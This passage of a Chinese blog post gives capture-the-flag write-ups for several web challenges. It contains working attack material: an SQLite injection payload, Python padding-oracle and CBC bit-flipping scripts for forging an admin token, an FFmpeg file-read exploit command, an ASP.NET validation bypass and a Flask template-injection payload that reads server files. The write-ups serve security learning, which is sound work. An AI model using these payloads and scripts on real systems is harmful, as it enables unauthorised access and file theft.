<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'util.php'</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="string">'config.php'</span>;</span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line">$method = (string) ($_SERVER[<span class="string">'REQUEST_METHOD'</span>] ?? <span class="string">'GET'</span>);</span><br><span class="line">$page = (string) ($_GET[<span class="string">'page'</span>] ?? <span class="string">'index'</span>);</span><br><span class="line"><span class="keyword">if</span> (!in_array($page, [<span class="string">'index'</span>, <span class="string">'create'</span>, <span class="string">'insert'</span>, <span class="string">'delete'</span>])) &#123;</span><br><span class="line">  redirect(<span class="string">'?page=index'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$message = $_SESSION[<span class="string">'flash'</span>] ?? <span class="string">''</span>;</span><br><span class="line"><span class="keyword">unset</span>($_SESSION[<span class="string">'flash'</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (in_array($page, [<span class="string">'insert'</span>, <span class="string">'delete'</span>]) &amp;&amp; !<span class="keyword">isset</span>($_SESSION[<span class="string">'database'</span>])) &#123;</span><br><span class="line">  flash(<span class="string">"Please create database first."</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SESSION[<span class="string">'database'</span>])) &#123;</span><br><span class="line">  $pdo = <span class="keyword">new</span> PDO(<span class="string">'sqlite:db/'</span> . $_SESSION[<span class="string">'database'</span>]);</span><br><span class="line">  $stmt = $pdo-&gt;query(<span class="string">"SELECT name FROM sqlite_master WHERE type='table' AND name &lt;&gt; '"</span> . FLAG_TABLE . <span class="string">"' LIMIT 1;"</span>);</span><br><span class="line">  $table_name = $stmt-&gt;fetch(PDO::FETCH_ASSOC)[<span class="string">'name'</span>];</span><br><span class="line"></span><br><span class="line">  $stmt = $pdo-&gt;query(<span class="string">"PRAGMA table_info(`&#123;$table_name&#125;`);"</span>);</span><br><span class="line">  $column_names = $stmt-&gt;fetchAll(PDO::FETCH_ASSOC);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($page === <span class="string">'insert'</span> &amp;&amp; $method === <span class="string">'POST'</span>) &#123;</span><br><span class="line">  $values = $_POST[<span class="string">'values'</span>];</span><br><span class="line">  $stmt = $pdo-&gt;prepare(<span class="string">"INSERT INTO `&#123;$table_name&#125;` VALUES (?"</span> . str_repeat(<span class="string">',?'</span>, count($column_names) - <span class="number">1</span>) . <span class="string">")"</span>);</span><br><span class="line">  $stmt-&gt;execute($values);</span><br><span class="line">  redirect(<span class="string">'?page=index'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($page === <span class="string">'create'</span> &amp;&amp; $method === <span class="string">'POST'</span> &amp;&amp; !<span class="keyword">isset</span>($_SESSION[<span class="string">'database'</span>])) &#123;</span><br><span class="line">  <span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'table_name'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'columns'</span>])) &#123;</span><br><span class="line">    flash(<span class="string">'Parameters missing.'</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  $table_name = (string) $_POST[<span class="string">'table_name'</span>];</span><br><span class="line">  $columns = $_POST[<span class="string">'columns'</span>];</span><br><span class="line">  $filename = bin2hex(random_bytes(<span class="number">16</span>)) . <span class="string">'.db'</span>;</span><br><span class="line">  $pdo = <span class="keyword">new</span> PDO(<span class="string">'sqlite:db/'</span> . $filename);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!is_valid($table_name)) &#123;</span><br><span class="line">    flash(<span class="string">'Table name contains dangerous characters.'</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (strlen($table_name) &lt; <span class="number">4</span> || <span class="number">32</span> &lt; strlen($table_name)) &#123;</span><br><span class="line">    flash(<span class="string">'Table name must be 4-32 characters.'</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (count($columns) &lt;= <span class="number">0</span> || <span class="number">10</span> &lt; count($columns)) &#123;</span><br><span class="line">    flash(<span class="string">'Number of columns is up to 10.'</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  $sql = <span class="string">"CREATE TABLE &#123;$table_name&#125; ("</span>;</span><br><span class="line">  $sql .= <span class="string">"dummy1 TEXT, dummy2 TEXT"</span>;</span><br><span class="line">  <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; count($columns); $i++) &#123;</span><br><span class="line">    $column = (string) ($columns[$i][<span class="string">'name'</span>] ?? <span class="string">''</span>);</span><br><span class="line">    $type = (string) ($columns[$i][<span class="string">'type'</span>] ?? <span class="string">''</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!is_valid($column) || !is_valid($type)) &#123;</span><br><span class="line">      flash(<span class="string">'Column name or type contains dangerous characters.'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (strlen($column) &lt; <span class="number">1</span> || <span class="number">32</span> &lt; strlen($column) || strlen($type) &lt; <span class="number">1</span> || <span class="number">32</span> &lt; strlen($type)) &#123;</span><br><span class="line">      flash(<span class="string">'Column name and type must be 1-32 characters.'</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $sql .= <span class="string">', '</span>;</span><br><span class="line">    $sql .= <span class="string">"`$column` $type"</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  $sql .= <span class="string">');'</span>;</span><br><span class="line"></span><br><span class="line">  $pdo-&gt;query(<span class="string">'CREATE TABLE `'</span> . FLAG_TABLE . <span class="string">'` (`'</span> . FLAG_COLUMN . <span class="string">'` TEXT);'</span>);</span><br><span class="line">  $pdo-&gt;query(<span class="string">'INSERT INTO `'</span> . FLAG_TABLE . <span class="string">'` VALUES ("'</span> . FLAG . <span class="string">'");'</span>);</span><br><span class="line">  $pdo-&gt;query($sql);</span><br><span class="line"></span><br><span class="line">  $_SESSION[<span class="string">'database'</span>] = $filename;</span><br><span class="line">  redirect(<span class="string">'?page=index'</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>去掉了部分没有用的代码，下面就来看看源码</p>
<p>注意到sql拼接创建表的语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CREATE TABLE &#123;$table_name&#125; (dummy1 TEXT, dummy2 TEXT</span><br></pre></td></tr></table></figure>

<p>google一下发现是SQLite</p>
<p>有关于SQLite三个知识点</p>
<p>第一个：我们在使用sqlite语法的时候列名是可以加方括号的，是为了和mysql语法兼容。例如：select [sql] from sqlite_master;</p>
<p>第二个：我们在使用sqlite_master时使用错误的语法，sqlite将会忽略后面列的名称，无论列的名称是否真实的存在，除非在列之间放置</p>
<p>第三个：我们在使用sqlite语法时，用该语句create table ..as select ..创建表时可以不用带括号</p>
<p>每个sqlite都有一个自动创建的库sqlite_master，里面保存了所有表名以及创建表时的create语句，可以从中获取flag的表名和字段名</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">table_name&#x3D;[aaa]as select [sql][&amp;columns[0][name]&#x3D;]from sqlite_master;&amp;columns[0][type]&#x3D;2</span><br></pre></td></tr></table></figure>

<p>等价于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">create table [aaa] as select sql from sqlite_master</span><br><span class="line">查找sqlite_master中sql列的值放入aaa表中</span><br></pre></td></tr></table></figure>

<img src="/2020/07/11/vacation2/9.png" class="">

<p>查到了表名和列名，继续查</p>
<img src="/2020/07/11/vacation2/10.png" class="">

<h2 id="CISCN2019-东北赛区-Day2-Web3-Point-System"><a href="#CISCN2019-东北赛区-Day2-Web3-Point-System" class="headerlink" title="[CISCN2019 东北赛区 Day2 Web3]Point System"></a>[CISCN2019 东北赛区 Day2 Web3]Point System</h2><p>开题，扫目录</p>
<img src="/2020/07/11/vacation2/11.png" class="">

<p>访问得到的路径，是一个前端API界面</p>
<img src="/2020/07/11/vacation2/12.png" class="">

<p>这里的注册不能直接用，用postman</p>
<img src="/2020/07/11/vacation2/13.png" class="">

<p>用这个账号登录，发现权限不够，看了一下数据传输过程</p>
<img src="/2020/07/11/vacation2/14.png" class="">

<p>token好像是base64，解密之后</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;signed_key&quot;:&quot;SUN4a1NpbmdEYW5jZVJhUHsFQR4ln5VFC9L09echkYhTWQgiwZohj27JWt98&#x2F;+1ZXvkP16YkJhBIHoJvCOJAsEgoP7x8E2FffKsH8ZXENQPt6&#x2F;XN7MTw3QO+6mlQ23ZOIdF817b59sxTzBNDzELdMA&#x3D;&#x3D;&quot;,&quot;role&quot;:3,&quot;user_id&quot;:1,&quot;payload&quot;:&quot;2xCDATnZ9AxdNyuipTgPLMTtIRwX6eDj&quot;,&quot;expire_in&quot;:1596028630&#125;</span><br></pre></td></tr></table></figure>

<p>signed_key继续解密，发现乱码，下面是看的赵师傅的blog做的</p>
<p>.前为明文后为乱码，推测前为 IV 后为加密后的密文，推测其为 AES CBC 加密</p>
<p>借用赵师傅的加密，伪造脚本，这里因为个人原因没跑成功，就只记下思路</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2.7</span></span><br><span class="line"><span class="comment"># -*- coding:utf8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line">host = <span class="string">"127.0.0.1"</span></span><br><span class="line">port = <span class="number">8233</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor</span><span class="params">(a, b)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">""</span>.join([chr(ord(a[i]) ^ ord(b[i % len(b)])) <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a))])</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">padoracle</span><span class="params">(key)</span>:</span></span><br><span class="line">    user_key_decode = base64.b64decode(key)</span><br><span class="line">    user_key_json_decode = json.loads(user_key_decode)</span><br><span class="line">    signed_key = user_key_json_decode[<span class="string">'signed_key'</span>]</span><br><span class="line">    signed_key_decoed = base64.b64decode(signed_key)</span><br><span class="line">    url = <span class="string">"http://"</span> + host + <span class="string">":"</span> + str(port) + <span class="string">"/frontend/api/v1/user/info"</span></span><br><span class="line">    N = <span class="number">16</span></span><br><span class="line">    total_plain = <span class="string">''</span></span><br><span class="line">    <span class="keyword">for</span> block <span class="keyword">in</span> range(<span class="number">0</span>, int(len(signed_key) / <span class="number">16</span>) - <span class="number">3</span>):</span><br><span class="line">        token = <span class="string">''</span></span><br><span class="line">        get = <span class="string">""</span></span><br><span class="line">        cipher = signed_key_decoed[<span class="number">16</span> + block * <span class="number">16</span>:<span class="number">32</span> + block * <span class="number">16</span>]</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, N + <span class="number">1</span>):</span><br><span class="line">            <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">256</span>):</span><br><span class="line">                token = signed_key_decoed[block * <span class="number">16</span>:<span class="number">16</span> + block * <span class="number">16</span>]</span><br><span class="line">                padding = xor(get, chr(i) * (i - <span class="number">1</span>))</span><br><span class="line">                c = (chr(<span class="number">0</span>) * (<span class="number">16</span> - i)) + chr(j) + padding + cipher</span><br><span class="line">                token = base64.b64encode(token + c)</span><br><span class="line">                user_key_json_decode[<span class="string">'signed_key'</span>] = token</span><br><span class="line">                header = &#123;<span class="string">'Key'</span>: base64.b64encode(json.dumps(user_key_json_decode))&#125;</span><br><span class="line">                res = requests.get(url, headers=header)</span><br><span class="line">                <span class="keyword">if</span> res.json()[<span class="string">'code'</span>] != <span class="number">205</span>:</span><br><span class="line">                    get = chr(j ^ i) + get</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">        plain = xor(get, signed_key_decoed[block * <span class="number">16</span>:<span class="number">16</span> + block * <span class="number">16</span>])</span><br><span class="line">        total_plain += plain</span><br><span class="line">    <span class="keyword">return</span> total_plain</span><br><span class="line">plain_text = padoracle(<span class="string">"eyJzaWduZWRfa2V5IjoiU1VONGExTnBibWRFWVc1alpWSmhVRm1zclQ3a2FGM1FXL29vWDdVcVRpZ215TVl5MFFZK1RlSzMya3hGZW94ay9ZNnkzaG0vaEJXK2lMaXVLdnNNS1NPK1ZQQ0pGSTdPbHJTL0dsYThWWmh1Y3p2NSs4djNXckNJSE5TbVJOS2xBRjREdlI2bDBSbFVaajB6WjgzWGlBPT0iLCJyb2xlIjozLCJ1c2VyX2lkIjoxLCJwYXlsb2FkIjoid2x1NUUwN1piR3pUNDVRUEhORzVReUpQT2UyNjUwalgiLCJleHBpcmVfaW4iOjE1NTY4NTM2Mzh9"</span>)</span><br><span class="line">print(plain_text)</span><br></pre></td></tr></table></figure>

<p>伪造</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2.7</span></span><br><span class="line"><span class="comment"># -*- coding:utf8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line">host = <span class="string">"127.0.0.1"</span></span><br><span class="line">port = <span class="number">8233</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cbc_attack</span><span class="params">(key, block, origin_content, target_content)</span>:</span></span><br><span class="line">    user_key_decode = base64.b64decode(key)</span><br><span class="line">    user_key_json_decode = json.loads(user_key_decode)</span><br><span class="line">    signed_key = user_key_json_decode[<span class="string">'signed_key'</span>]</span><br><span class="line">    cipher_o = base64.b64decode(signed_key)</span><br><span class="line">    <span class="keyword">if</span> block &gt; <span class="number">0</span>:</span><br><span class="line">        iv_prefix = cipher_o[:block * <span class="number">16</span>]</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        iv_prefix = <span class="string">''</span></span><br><span class="line">    iv = cipher_o[block * <span class="number">16</span>:<span class="number">16</span> + block * <span class="number">16</span>]</span><br><span class="line">    cipher = cipher_o[<span class="number">16</span> + block * <span class="number">16</span>:]</span><br><span class="line">    iv_array = bytearray(iv)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>, <span class="number">16</span>):</span><br><span class="line">        iv_array[i] = iv_array[i] ^ ord(origin_content[i]) ^ ord(target_content[i])</span><br><span class="line">    iv = bytes(iv_array)</span><br><span class="line">    user_key_json_decode[<span class="string">'signed_key'</span>] = base64.b64encode(iv_prefix + iv + cipher)</span><br><span class="line">    <span class="keyword">return</span> base64.b64encode(json.dumps(user_key_json_decode))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_user_info</span><span class="params">(key)</span>:</span></span><br><span class="line">    r = requests.post(<span class="string">"http://"</span> + host + <span class="string">":"</span> + str(port) + <span class="string">"/frontend/api/v1/user/info"</span>, headers = &#123;<span class="string">"Key"</span>: key&#125;)</span><br><span class="line">    <span class="keyword">if</span> r.json()[<span class="string">'code'</span>] == <span class="number">100</span>:</span><br><span class="line">        print(<span class="string">"获取成功！"</span>)</span><br><span class="line">    <span class="keyword">return</span> r.json()[<span class="string">'data'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">modify_role_palin</span><span class="params">(key, role)</span>:</span></span><br><span class="line">    user_key_decode = base64.b64decode(user_key)</span><br><span class="line">    user_key_json_decode = json.loads(user_key_decode)</span><br><span class="line">    user_key_json_decode[<span class="string">'role'</span>] = role</span><br><span class="line">    <span class="keyword">return</span> base64.b64encode(json.dumps(user_key_json_decode))</span><br><span class="line">print(<span class="string">"翻转 Key:"</span>)</span><br><span class="line">user_key = cbc_attack(<span class="string">"eyJzaWduZWRfa2V5IjoiU1VONGExTnBibWRFWVc1alpWSmhVRm1zclQ3a2FGM1FXL29vWDdVcVRpZ215TVl5MFFZK1RlSzMya3hGZW94ay9ZNnkzaG0vaEJXK2lMaXVLdnNNS1NPK1ZQQ0pGSTdPbHJTL0dsYThWWmh1Y3p2NSs4djNXckNJSE5TbVJOS2xBRjREdlI2bDBSbFVaajB6WjgzWGlBPT0iLCJyb2xlIjozLCJ1c2VyX2lkIjoxLCJwYXlsb2FkIjoid2x1NUUwN1piR3pUNDVRUEhORzVReUpQT2UyNjUwalgiLCJleHBpcmVfaW4iOjE1NTY4NTM2Mzh9"</span>, <span class="number">0</span>, <span class="string">'&#123;"role":3,"user_'</span>, <span class="string">'&#123;"role":1,"user_'</span>)</span><br><span class="line">user_key = modify_role_palin(user_key, <span class="number">1</span>)</span><br><span class="line">print(user_key)</span><br><span class="line">print(<span class="string">"测试拉取用户信息："</span>)</span><br><span class="line">user_info = get_user_info(user_key)</span><br><span class="line">print(user_info)</span><br></pre></td></tr></table></figure>

<p>替换一下cookie就能成功登录(厚颜无耻盗用一下赵总的图)</p>
<img src="/2020/07/11/vacation2/15.png" class="">

<p>在文件上传处可以上传视频，经过多次上传下载比对MD5值，推测其后端利用了 FFMpeg 对视频文件做处理，那么就尝试利用 FFMpeg 的漏洞来读取文件， <a href="https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py" target="_blank" rel="noopener">https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 gen_xbin_avi.py file:&#x2F;&#x2F;&#x2F;flag test.avi</span><br></pre></td></tr></table></figure>

<p>之后上传，再下载视频，在视频的第一帧里就能看到flag了</p>
<h2 id="Windows-HITCON-2019-Buggy-Net"><a href="#Windows-HITCON-2019-Buggy-Net" class="headerlink" title="[Windows][HITCON 2019]Buggy_Net"></a>[Windows][HITCON 2019]Buggy_Net</h2><p>给了源码，重点就一点点</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">bool isBad = <span class="literal">false</span>;</span><br><span class="line">   <span class="keyword">try</span> &#123;</span><br><span class="line">       <span class="keyword">if</span> ( Request.Form[<span class="string">"filename"</span>] != <span class="literal">null</span> ) &#123;</span><br><span class="line">           isBad = Request.Form[<span class="string">"filename"</span>].Contains(<span class="string">".."</span>) == <span class="literal">true</span>;</span><br><span class="line">       &#125;</span><br><span class="line">   &#125; <span class="keyword">catch</span> (Exception ex) &#123;</span><br><span class="line">       </span><br><span class="line">   &#125; </span><br><span class="line"></span><br><span class="line">   <span class="keyword">try</span> &#123;</span><br><span class="line">       <span class="keyword">if</span> (!isBad) &#123;</span><br><span class="line">           Response.Write(System.IO.File.ReadAllText(@<span class="string">"C:\inetpub\wwwroot\" + Request.Form["</span>filename<span class="string">"]));</span></span><br><span class="line"><span class="string">       &#125;</span></span><br><span class="line"><span class="string">   &#125; catch (Exception ex) &#123;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">   &#125;</span></span><br></pre></td></tr></table></figure>

<p>要想读取到flag，就要让!isBad为真，根据代码也就是要第一个异常处理能够成功触发，就不会重新对isBad重新赋值为true</p>
<p>找资料这题考察的是asp，<a href="https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/" target="_blank" rel="noopener">https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/</a></p>
<p>根据这篇文章里的内容，Sending payload in the POST body using GET，就能够触发载荷</p>
<img src="/2020/07/11/vacation2/16.png" class="">

<h2 id="b01lers2020-Scrambled"><a href="#b01lers2020-Scrambled" class="headerlink" title="[b01lers2020]Scrambled"></a>[b01lers2020]Scrambled</h2><p>考察点在cookie中的transmissions字段，去除掉开头和结尾的kxkxkxkxsh，中间剩下的字符和flag有关</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> unquote</span><br><span class="line">url=<span class="string">'http://7d447401-fe52-488f-b019-94ae1bc70742.node3.buuoj.cn/'</span></span><br><span class="line">r=requests.session()</span><br><span class="line">cookie=r.get(url).cookies</span><br><span class="line">data=[<span class="number">0</span>]*<span class="number">100</span></span><br><span class="line">print(data)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">300</span>):</span><br><span class="line">    cookie=r.get(url).cookies</span><br><span class="line">    key=unquote(requests.utils.dict_from_cookiejar(cookie)[<span class="string">'transmissions'</span>].replace(<span class="string">'kxkxkxkxsh'</span>,<span class="string">''</span>))[<span class="number">2</span>:]</span><br><span class="line">    print(key)</span><br><span class="line">    value=unquote(requests.utils.dict_from_cookiejar(cookie)[<span class="string">'transmissions'</span>].replace(<span class="string">'kxkxkxkxsh'</span>,<span class="string">''</span>))[<span class="number">0</span>:<span class="number">1</span>]</span><br><span class="line">    print(value)</span><br><span class="line">    data[int(key)]=value</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> data:</span><br><span class="line">    print(i,end=<span class="string">''</span>)</span><br><span class="line">   <span class="comment">#flag&#123;874a0593-7672-45f5-897c-7a2803df653800000000000000000000000000000000000000000000000000000000000</span></span><br></pre></td></tr></table></figure>

<p>这里对flag进行一下处理，<code>flag{874a0593-7672-45f5-897c-7a2803df6538}</code></p>
<h2 id="pasecactf-2019-flask-ssti"><a href="#pasecactf-2019-flask-ssti" class="headerlink" title="[pasecactf_2019]flask_ssti"></a>[pasecactf_2019]flask_ssti</h2><p>开题，根据题目是flask_ssti直接用python 的模板注入进行测试</p>
<img src="/2020/07/11/vacation2/17.png" class="">

<p>先看一下config</p>
<img src="/2020/07/11/vacation2/18.png" class="">

<p>看到后面有加密后的flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#39;: &#39;-M7\x10w\x120kc\x03q7x\x0eG_o\x01(DL\x1c\x0b\x17&#123;o\x01i\x02\x0fAY&quot;\x01\x7f+\x12&gt;B]NG</span><br></pre></td></tr></table></figure>

<p>解密应该就能拿到flag了，因为是异或运算，加密脚本和解密脚本就是同一个，题目描述中已经给出了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encode</span><span class="params">(line, key, key2)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">''</span>.join(chr(x ^ ord(line[x]) ^ ord(key[::<span class="number">-1</span>][x]) ^ ord(key2[x])) <span class="keyword">for</span> x <span class="keyword">in</span> range(len(line)))</span><br><span class="line">t = <span class="string">'-M7\x10w\x120kc\x03q7x\x0eG_o\x01(DL\x1c\x0b\x17&#123;o\x01i\x02\x0fAY"\x01\x7f+\x12&gt;B]NG'</span></span><br><span class="line">s = encode(t, <span class="string">'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3'</span>, <span class="string">'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT'</span>)</span><br><span class="line">print(s)</span><br><span class="line"><span class="comment">#flag&#123;c2e13cd3-8d56-4d65-bda9-c7173d56fdba&#125;</span></span><br></pre></td></tr></table></figure>

<p>还有一种做法是用flask的基类和对象进行读取，附上wp<a href="https://guokeya.github.io/post/zIiwsY95N/" target="_blank" rel="noopener">https://guokeya.github.io/post/zIiwsY95N/</a></p>
<p>这张图借用不知名师傅的，更清楚些</p>
<img src="/2020/07/11/vacation2/20.png" class="">

<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()[&quot;\x5F\x5Fclass\x5F\x5F&quot;][&quot;\x5F\x5Fbases\x5F\x5F&quot;][0][&quot;\x5F\x5Fsubclasses\x5F\x5F&quot;]()[91][&quot;get\x5Fdata&quot;](0, &quot;&#x2F;proc&#x2F;self&#x2F;fd&#x2F;3&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<img src="/2020/07/11/vacation2/19.png" class="">
    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    Donate
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="Peguin WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="Peguin Alipay">
        <p>Alipay</p>
      </div>

  </div>
</div>

        

<div>
